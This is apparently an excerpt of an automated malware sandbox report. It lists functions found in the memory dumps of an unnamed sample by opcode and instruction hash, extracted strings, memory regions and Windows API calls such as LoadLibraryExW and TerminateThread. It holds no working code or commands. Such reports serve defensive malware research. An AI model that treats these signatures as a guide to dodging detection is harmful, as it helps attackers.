                                                            • Opcode ID: fcc47f43514dfc13e52017fd1ec048cde9c9ad5355b643967959853abb36568c
                                                            • Instruction ID: 491bec40df6d2636bc1283163ff2adc854e6c6c0a3875888a60f607d03c5d4e7
                                                            • Opcode Fuzzy Hash: fcc47f43514dfc13e52017fd1ec048cde9c9ad5355b643967959853abb36568c
                                                            • Instruction Fuzzy Hash: A03102B1C10219EFCB04DF94DD89DEEBBB8FF48704F10422AE602A7164E774654ACBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o&m$(o&m$(o&m$(o&m$(o&m$(o&m$(o&m$,*m$,*m
                                                            • API String ID: 0-368963723
                                                            • Opcode ID: c29861e3aa6190ca07960c60f7fca6b4de012fa60f101614e8e330fbcc325e25
                                                            • Instruction ID: ea398cc756ece70b34766415cbefe72b836a0775f5325ee23f27789274e37605
                                                            • Opcode Fuzzy Hash: c29861e3aa6190ca07960c60f7fca6b4de012fa60f101614e8e330fbcc325e25
                                                            • Instruction Fuzzy Hash: D6829030A05609DFCB54CFA8D984AAEBBF6FF89304F259559E409EB2A1C730EC41CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o&m$(o&m$(o&m$,*m$,*m$H*m
                                                            • API String ID: 0-1155830982
                                                            • Opcode ID: fd675f7bae6b95daa21c74d885461cc4e8be33d6c5176e313b5eb10089a4755a
                                                            • Instruction ID: f2cde4dee964ec5c8d63a30b659f9b123b21b703ab74f0bbcdbc057286a6afea
                                                            • Opcode Fuzzy Hash: fd675f7bae6b95daa21c74d885461cc4e8be33d6c5176e313b5eb10089a4755a
                                                            • Instruction Fuzzy Hash: 2872A470A012198FCB55CFA9D984AAEBBF6FF88304F258469E505EB361DB34EC41CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'&m$4'&m$$&m$$&m$;&m
                                                            • API String ID: 0-276051176
                                                            • Opcode ID: 8326fa1a0c86e6ee920bfcdab5b5cf612be5576fae45499cecc9ce84163ec0b0
                                                            • Instruction ID: 7531ec387297173aa13ca799700023784325af46672b7b03499cebd579fa9050
                                                            • Opcode Fuzzy Hash: 8326fa1a0c86e6ee920bfcdab5b5cf612be5576fae45499cecc9ce84163ec0b0
                                                            • Instruction Fuzzy Hash: 024269307192518FDB16CB78C8547BEBBEAAF95300F18846AE506CB3A6DB75CC41C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348620510.000000001CDA0000.00000040.00000001.sdmp, Offset: 1CDA0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <0. $D#~ $D#~ $D#~ $D#~
                                                            • API String ID: 0-3183539065
                                                            • Opcode ID: a397e619bebe64bb223f322e73a6d47222239153ea7be4486c6ce101b58e5ca5
                                                            • Instruction ID: d65280d8ede1c2d7ceb453e50e6c4456a4b7eed785094aea650de2f97c75deb7
                                                            • Opcode Fuzzy Hash: a397e619bebe64bb223f322e73a6d47222239153ea7be4486c6ce101b58e5ca5
                                                            • Instruction Fuzzy Hash: 5AF13B30A00219CFDB04CFA9C984B9DBBB1EF88304F15C569E409AF2A5DB71E946CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 1 lm$LR&m$LR&m$X*m
                                                            • API String ID: 0-1819219680
                                                            • Opcode ID: e362e14096ad34c4a31ac132861eb5a1452491518ec83065e8f0c0e06bf1c14f
                                                            • Instruction ID: 5eb3fd3348ec317b920d8e0d7ab77e8f1beeaf83d36498ac18b5df32fd1eb9bd
                                                            • Opcode Fuzzy Hash: e362e14096ad34c4a31ac132861eb5a1452491518ec83065e8f0c0e06bf1c14f
                                                            • Instruction Fuzzy Hash: 4AF159317086408FD7169778D8146AE7BA6DF86308F1A84BAE449DB3D3DB35CC468762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X*m$X*m$X*m
                                                            • API String ID: 0-3789659176
                                                            • Opcode ID: ac51734a303b0bff03efda55f1a33e7d7e1c45080cdef1dabee72812d8cd947f
                                                            • Instruction ID: 07f7d154e9c8d78df36dbad81e2aa0644a514898d3ac19d45c4e620705cf1854
                                                            • Opcode Fuzzy Hash: ac51734a303b0bff03efda55f1a33e7d7e1c45080cdef1dabee72812d8cd947f
                                                            • Instruction Fuzzy Hash: CDC2F53164D106CBE7694F6CC4403A9B763EF4A304F2488B9D096BF597CB36E8478B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: h0 $h0 $h0
                                                            • API String ID: 0-261085282
                                                            • Opcode ID: bca3a49294443e7a47eabc2bf937598daaa909c633465128ad307fa5d0db3759
                                                            • Instruction ID: 37dbe98a0bca2841f2f5e58d06ac09b225e2c6453f4aa9447d517c7bcadd389c
                                                            • Opcode Fuzzy Hash: bca3a49294443e7a47eabc2bf937598daaa909c633465128ad307fa5d0db3759
                                                            • Instruction Fuzzy Hash: 3E42D430B04249CFEB25DFA8C8547ADB7E2AF95304F25C469D509AF399DB709C84CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: 5350253688d893ae22adac26401338cdd85db72d27ede531b419f0d932a85682
                                                            • Instruction ID: 22452406d0aa52b521ebae08d594333945acd74e99156b80c511d73c222f95b6
                                                            • Opcode Fuzzy Hash: 5350253688d893ae22adac26401338cdd85db72d27ede531b419f0d932a85682
                                                            • Instruction Fuzzy Hash: 38A21474A09228CFCB65DF74C89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X*m$$&m
                                                            • API String ID: 0-3812672571
                                                            • Opcode ID: 0abc07cda6968d36a45e759460e58462496e20ec5e511b5421b25db6e3088979
                                                            • Instruction ID: 19263a12b31de31f03d5c7a2560f362a4020fb843ed5ff90626daed4632857d7
                                                            • Opcode Fuzzy Hash: 0abc07cda6968d36a45e759460e58462496e20ec5e511b5421b25db6e3088979
                                                            • Instruction Fuzzy Hash: 01819234B08328CBCF089FB498957BE77B7AFC9714B168869E446E7384DF3488429791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: lM. $lM.
                                                            • API String ID: 0-2071068893
                                                            • Opcode ID: d65cf70dad891a19c3c4bafc566476bbfa6c55c64b68f6d3aab908c13955c371
                                                            • Instruction ID: 574f507ac8bb140da5a9c1cec785f1b9c10b514305dacf485975900f050a72ca
                                                            • Opcode Fuzzy Hash: d65cf70dad891a19c3c4bafc566476bbfa6c55c64b68f6d3aab908c13955c371
                                                            • Instruction Fuzzy Hash: 86A18D34E54319DFCB04DFA4C8949DDBBBAFF89314F118659E50AAB2A0DF30A845CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,*m$,*m
                                                            • API String ID: 0-3256644864
                                                            • Opcode ID: 7f6c02b462dd046c2ea8efa24aa15ff7aa327383e99e5477144f67f0742a6e55
                                                            • Instruction ID: 69fe9959baeceb6b304fa87b7339e6a00d5f71ed5f1bf0d8bf5e2fdee06588c7
                                                            • Opcode Fuzzy Hash: 7f6c02b462dd046c2ea8efa24aa15ff7aa327383e99e5477144f67f0742a6e55
                                                            • Instruction Fuzzy Hash: 0191AF34A00105CFCB14CF69D8889AAB7F6BF89358B1592AAD405FB361DB31EC41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PH&m
                                                            • API String ID: 0-1679659527
                                                            • Opcode ID: 815ea61c86cbdfc7ed87462e148b926c4a5926d4a19e570b965d951e1f5037d2
                                                            • Instruction ID: c62ec65bed5642d43b5bd86ffa326a108b338b276a618c28baaaa51c28541039
                                                            • Opcode Fuzzy Hash: 815ea61c86cbdfc7ed87462e148b926c4a5926d4a19e570b965d951e1f5037d2
                                                            • Instruction Fuzzy Hash: EC72D331F002458FEB00DBB9C89479E77F2AF8A210F558529E806EB3B1EB75DC418B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H+m
                                                            • API String ID: 0-900311727
                                                            • Opcode ID: 43dbfbb971e526e5992c981c72fa399ea86f09548aee18343cd97e5bc9209042
                                                            • Instruction ID: af9b789a6e8ff5932f87b5e6e9147bd5b8114c3b83d0aa1cae555bb84530c949
                                                            • Opcode Fuzzy Hash: 43dbfbb971e526e5992c981c72fa399ea86f09548aee18343cd97e5bc9209042
                                                            • Instruction Fuzzy Hash: E342A334B142198FCB15DFB8C4946AEB7F2AFC9204F118869E605DB395DF359C42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: lM.
                                                            • API String ID: 0-413114576
                                                            • Opcode ID: dfdd91289b0a92b67678f41bb68336d481efd423daa2e6514270a4a7d2b4dd76
                                                            • Instruction ID: ad074d6fc31f2e111e8f60fe48f185184c024e5623cbf979390ae8f5af6b9b6d
                                                            • Opcode Fuzzy Hash: dfdd91289b0a92b67678f41bb68336d481efd423daa2e6514270a4a7d2b4dd76
                                                            • Instruction Fuzzy Hash: 9F918035E14719DFCB04DFA0C8948DDBBBAEF89314F158659E50AAB2A0DF30A885CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78fec80d0e9e9e27447d75e10132f63fec1faf6e5a61a64f251c6e3b635bc97a
                                                            • Instruction ID: 3dc14ac80eeabfc2cb20eb33eb860cc6fdcc6ba0107fc35b756f6fd9afff5324
                                                            • Opcode Fuzzy Hash: 78fec80d0e9e9e27447d75e10132f63fec1faf6e5a61a64f251c6e3b635bc97a
                                                            • Instruction Fuzzy Hash: 2442C230B142059FDF14DBA8C8A47AEB7F6AF85304F158829E509EB395DB35DC81C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348620510.000000001CDA0000.00000040.00000001.sdmp, Offset: 1CDA0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcd9f16851f859e75fa3b34f8e32179a688ab9194962f321926126708db80a95
                                                            • Instruction ID: 36e34374684f7275596f192c449dd532209dc07cfe87bca3a218123940e1a338
                                                            • Opcode Fuzzy Hash: dcd9f16851f859e75fa3b34f8e32179a688ab9194962f321926126708db80a95
                                                            • Instruction Fuzzy Hash: CE525A31A0061ACFDB14CF64C884BAEB7B6FF44304F5185A9E946AB261D771FD86CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53d86067067130768d3e3a84343975d4563710fb1d0ad2d3303987bda3b75f78
                                                            • Instruction ID: 7ddbd318b21bac8bd219c7ac59bca265a9ad61ceca28f54cc22c6e404547bf70
                                                            • Opcode Fuzzy Hash: 53d86067067130768d3e3a84343975d4563710fb1d0ad2d3303987bda3b75f78
                                                            • Instruction Fuzzy Hash: A422F434B042459FEB04CBB4C854B9EB7F6AF8A300F158569E506EB3A5DB35EC41CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e11ab3407dea4f6e652d07551e481ed90ae6c85cf955305bc2dc95550ceeeef9
                                                            • Instruction ID: f4569b7e56a683353f01b4a17a17a837b8ccfd9e2615c4c8d0127e7a48f958e4
                                                            • Opcode Fuzzy Hash: e11ab3407dea4f6e652d07551e481ed90ae6c85cf955305bc2dc95550ceeeef9
                                                            • Instruction Fuzzy Hash: DF128DF0409B458EE3618F65CD4C19ABBB2FF45728B50820AD2652B2F1DBBC158BEF44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d06d206e16819fa9dffa84efc0b698c2f82b03929f2e68b9603f0fe9e15e90df
                                                            • Instruction ID: c907863215dc4cbb39f01af8361b27759656e918516ab5a65f7e2d4d4db82f2c
                                                            • Opcode Fuzzy Hash: d06d206e16819fa9dffa84efc0b698c2f82b03929f2e68b9603f0fe9e15e90df
                                                            • Instruction Fuzzy Hash: 34B15A70E002098FDB10CFB9E8857DEBBF2AF88708F149529D815BB294EB749945CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0337743b7d831a4a36b0bdc50af38ec2040bc60c442e0b9a456144bef44e8a89
                                                            • Instruction ID: 8d68f1b908d28a2e4ee942e6593b770a9a720e1652859f27e0de6b72d3c29578
                                                            • Opcode Fuzzy Hash: 0337743b7d831a4a36b0bdc50af38ec2040bc60c442e0b9a456144bef44e8a89
                                                            • Instruction Fuzzy Hash: 95B14970E002098FDB10CFB9E8857DDBBF2AF88708F249529D815BB294EB749945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ade3b2101c7d7a0a0a83c027fdf943d245685fc149672c3471d8630609ba8f4
                                                            • Instruction ID: 4fcd4106df813cdc2428c47163ebd5054a5c2a93a877e40ccb84d1479ce947c7
                                                            • Opcode Fuzzy Hash: 4ade3b2101c7d7a0a0a83c027fdf943d245685fc149672c3471d8630609ba8f4
                                                            • Instruction Fuzzy Hash: BCB13BB0F042098FDF10CFA9E88579DBBF2AF88718F159529D415BB294EB749845CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'&m$H*m$H*m$LR&m$LR&m
                                                            • API String ID: 0-560453800
                                                            • Opcode ID: 514a96afa51aa4e6e72441a55ffe89773c3b7fd0cb96b61e6a8a27aa12b06f0d
                                                            • Instruction ID: 43d7cceadbb1b75ee9afb82f0a4774f8055615f73cf943fe47a7095827e1294b
                                                            • Opcode Fuzzy Hash: 514a96afa51aa4e6e72441a55ffe89773c3b7fd0cb96b61e6a8a27aa12b06f0d
                                                            • Instruction Fuzzy Hash: A5B13B30B152499FCB04EFB4C894AAEB7F6EF85200F158869D506DB395EF319D05C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1DE657B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID: \O. $\O. $lM.
                                                            • API String ID: 4139908857-2264764590
                                                            • Opcode ID: 6dc7a077f287f13014dde1689a7f54372497c003b83db247045ba6afe6c8249d
                                                            • Instruction ID: a05a76ef53c00e118207b75449a79c2aad43445e4e822fe180f75b7e50ecad5f
                                                            • Opcode Fuzzy Hash: 6dc7a077f287f13014dde1689a7f54372497c003b83db247045ba6afe6c8249d
                                                            • Instruction Fuzzy Hash: 88C19E74B447458FCB04DFB9C89496EBBF6AF88204B11892AD50AD7761DF34F805CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: ddb4b76eb8ff44f051788ddff755bf2c71aa708a4ff49b5a7b6f4d46ad3159a3
                                                            • Instruction ID: d99f6a1230ca7d48e0c004a5eae341f355412da0abd824f91d8dfcad2af86670
                                                            • Opcode Fuzzy Hash: ddb4b76eb8ff44f051788ddff755bf2c71aa708a4ff49b5a7b6f4d46ad3159a3
                                                            • Instruction Fuzzy Hash: AB620374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: d7a1e2769287b81156753706ce3ec247a253e76adaa09523b0b01fc951a0fae8
                                                            • Instruction ID: 331ee51cb0587fd8f963bc19c03b089fb06b3dab2b957f5be0649790f2bf7de5
                                                            • Opcode Fuzzy Hash: d7a1e2769287b81156753706ce3ec247a253e76adaa09523b0b01fc951a0fae8
                                                            • Instruction Fuzzy Hash: CD621374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: 8ee002b55b95d6601090cb562f82b33a574070f8bd4d2d3cd78e47c8046ac685
                                                            • Instruction ID: c1a8b03ab4387d88141313c34c9683f0910169e68c1e1197219cf6f0c215f540
                                                            • Opcode Fuzzy Hash: 8ee002b55b95d6601090cb562f82b33a574070f8bd4d2d3cd78e47c8046ac685
                                                            • Instruction Fuzzy Hash: BB521474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • TerminateThread.KERNEL32(-11FAD871), ref: 00F0C12A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339683086.0000000000F0C000.00000040.00000001.sdmp, Offset: 00F0C000, based on PE: false
                                                            Similarity
                                                            • API ID: TerminateThread
                                                            • String ID: [J`v
                                                            • API String ID: 1852365436-2631852039
                                                            • Opcode ID: f2602157a48ffbe092dec6f610c32ea0a836df0f7c3a4a34a9de9c5dbdb1617c
                                                            • Instruction ID: 02432bae66214306c617647b3b34ae112a2444b3dc64e68dc4308d619f9dbb0e
                                                            • Opcode Fuzzy Hash: f2602157a48ffbe092dec6f610c32ea0a836df0f7c3a4a34a9de9c5dbdb1617c
                                                            • Instruction Fuzzy Hash: 04217C729443519FCB608F28C8D57E777E2EF02210F5942ABEC858B6A6D3314885E343
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: 8b73678c478e4791147d9c0c427e22672207a5c1e63b88051a6a16a6796fd7a2
                                                            • Instruction ID: 4047b9b22fe6b05bf3626ad95c5229bce85d7303118aa57b196e3ba43bbb3275
                                                            • Opcode Fuzzy Hash: 8b73678c478e4791147d9c0c427e22672207a5c1e63b88051a6a16a6796fd7a2
                                                            • Instruction Fuzzy Hash: D4521474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: cfb93ef70742bae6fe6414b6a60d1fa1f5742033995885e4f43c171702fafd87
                                                            • Instruction ID: 5b89d89378985838b0594cd0062a9760026af4388f3fe4e8194246b3c10a7cda
                                                            • Opcode Fuzzy Hash: cfb93ef70742bae6fe6414b6a60d1fa1f5742033995885e4f43c171702fafd87
                                                            • Instruction Fuzzy Hash: 6C521474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: 01d29ad0da1e2145e8fd5d7af3809134dbdef26fc94227053abdda9171a17dfb
                                                            • Instruction ID: 9f1a52db2466f7509748396bb706735f665226f320cd9ada6239f0cd7abfe885
                                                            • Opcode Fuzzy Hash: 01d29ad0da1e2145e8fd5d7af3809134dbdef26fc94227053abdda9171a17dfb
                                                            • Instruction Fuzzy Hash: DB520374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA2354CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: faf83441af5aefb32402aeb6fe98611345adc2c220f17e34e0beb54753f102ad
                                                            • Instruction ID: 4ad37ab6d1cd92ff3df400d918b60ecc07afdcac92e9be3e7b8064fe4bee8960
                                                            • Opcode Fuzzy Hash: faf83441af5aefb32402aeb6fe98611345adc2c220f17e34e0beb54753f102ad
                                                            • Instruction Fuzzy Hash: 4C521374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserExceptionDispatcher.NTDLL ref: 00E46B75
                                                            • LdrInitializeThunk.NTDLL ref: 00E472D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: DispatcherExceptionInitializeThunkUser
                                                            • String ID:
                                                            • API String ID: 243558500-0
                                                            • Opcode ID: 9939709eb3a35d9daa17893e03cc2fbdd0ba550f979d3d2b0287d37723945f12
                                                            • Instruction ID: 83bf11f9e6be221ae9992e488ac097cb6f5f13c884e0d58b44547bc20b93ea07
                                                            • Opcode Fuzzy Hash: 9939709eb3a35d9daa17893e03cc2fbdd0ba550f979d3d2b0287d37723945f12
                                                            • Instruction Fuzzy Hash: FE521374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1CDA2791,00000800), ref: 1CDA2822
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348620510.000000001CDA0000.00000040.00000001.sdmp, Offset: 1CDA0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: &.
                                                            • API String ID: 1029625771-2380227476
                                                            • Opcode ID: 86a09c41d6335d1a8d751b75e4e242d1fea2067c5b252195320d79266949cafa
                                                            • Instruction ID: 4610c643145e2a5e22d917d7c1ccb6ec10293754d58674cf32a448076bf00741
                                                            • Opcode Fuzzy Hash: 86a09c41d6335d1a8d751b75e4e242d1fea2067c5b252195320d79266949cafa
                                                            • Instruction Fuzzy Hash: 5D11F9B5D002599FDB14CFAAD444ADEFBF8EF48310F10842AE919A7710C375A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8b55b0fded446b8013d1d40a98b5f26ec2148a83223e74efa6b437284c0fd1fe
                                                            • Instruction ID: 2959bdf71a591b43e51b1c2eccfab398896d275e6510c78bdca70601a734c25c
                                                            • Opcode Fuzzy Hash: 8b55b0fded446b8013d1d40a98b5f26ec2148a83223e74efa6b437284c0fd1fe
                                                            • Instruction Fuzzy Hash: C5521374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
